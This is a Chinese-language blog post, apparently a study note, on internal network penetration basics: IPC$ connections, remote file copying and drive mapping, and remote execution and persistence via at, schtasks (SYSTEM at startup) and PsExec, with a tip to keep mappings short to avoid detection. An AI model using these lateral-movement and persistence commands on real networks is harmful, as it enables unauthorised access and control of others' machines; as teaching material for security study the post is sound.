Bu1'Blog

如果能控制粗鄙的狂喜,就不会有深入骨髓的悲伤。

0%

任务执行和建立共享

内网渗透基础之共享连接及定时任务,稍微总结了下,写的东西都比较浅。

共享连接

ipc$

IPC$(Internet Process Connection)是共享 “命名管道 “的资源(大家都是这么说的),它是为了让进程间通信而开放的命名管道,可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。

如果远程服务器未开启139、445端口,无法使用IPC$进行连接;在同一时间内,两个ip之间只允许建立一个连接。

在初次安装系统时还打开了默认共享,即所有的逻辑共享(c$,d$,e$……)和系统目录winnt或管理员目录(admin$)共享。

建立ipc$连接

  • net use \\192.168.3.122\ipc$ /u:”” “” 先空连接探测
  • net use 查看当前机器中的ipc连接有哪些
  • net use \\192.168.3.122\ipc$ “password” /user:admin 有密码的连接
  • net use \\192.168.3.122\ipc$ /del #删除指定ipc连接
  • net use * /del #删除所有连接
  • net share 查看共享
  • 删除共享(重启后默认共享仍然存在)
    • net share ipc$ /delete
    • net share admin$ /delete
    • net share c$ /delete
    • net share d$ /delete
    • … e,f盘类似

检验ipc$连接

  • dir \\192.169.226.139\c$ 查看远程连接对象的目录

传输文件

  • copy calc.bat \\192.169.226.139\c$ 传输文件

硬盘映射

  • net use p: \\192.168.226.139\c$ 映射远控机器的C盘到本地
  • net use p: /del 删除映射(实际的渗透过程中应该尽可能缩短映射时间防止被发现)

定时任务

At命令

  • 建立任务

    win7以前一般是使用“AT”命令进行定时操作。一般在ipc$连接后可以开始定时任务。命令格式: at \\计算机名字或者ip 执行时间 程序目录

    假如执行C盘下的脚本:at \\192.168.226.139 11:30 c:\\calc.bat

  • 清除任务

    at \\192.168.226.139 id /delete

    id为空则会删除所有的作业

  • 执行任务

    at \\192.168.226.139 11:30 cmd.exe /c "ipconfig > c:\1.txt"

    由于没有回显结果,所以可以存储在文本文件中查看命令执行后的回显

schtasks

win7以后可使用schtasks,这个命令的好处在于可以更加灵活的控制脚本的启动时间。

  • 创建任务

    schtasks /create /s 192.168.226.139 /tn name /sc onstart /tr c:\calc.bat /ru system /f

    onstart代表任务在每次系统启动的时候运行 ,name是为任务取得名字

  • 激活任务

    schtasks /run /s 192.168.226.139 /i /tn "name"

  • 删除任务

    schtasks /delete /s 192.168.226.139 /tn "name" /f

注意:这个命令在使用时会产生大量的日志

Psexec

第一次使用会弹窗,输入–accepteula这个参数就可以绕过。

  • 执行任务

    psexec.exe \\ip –accepteula -u username -p password program.exe

  • 假如已经建立ipc连接

    psexec.exe \\ip –accepteula cmd.exe

  • 骚操作(-s 管理员 -i 靶机是否能看到 –d命令执行后返回)

    • psexec \\ip -u admini -p pwd -d -s calc 管理员权限且靶机不显示
    • psexec \\ip -u admini -p pwd -i -d cmd /c start http:// www.baidu.com 靶机打开浏览器且靶机弹窗
    • psexec \\ip -u admin -p pwd -s cmd 此条命令会反弹靶机的cmd到本机

cmd建立非空文件命令

  • copy con 1.txt 创建文件并开始输入内容 ctrl+z 后加回车键结束输入
  • echo 内容 > 1.txt 将内容输出到1.txt
  • echo 内容 >> 1.txt 将内容追加到1.txt
  • type 1.txt 查看文件内容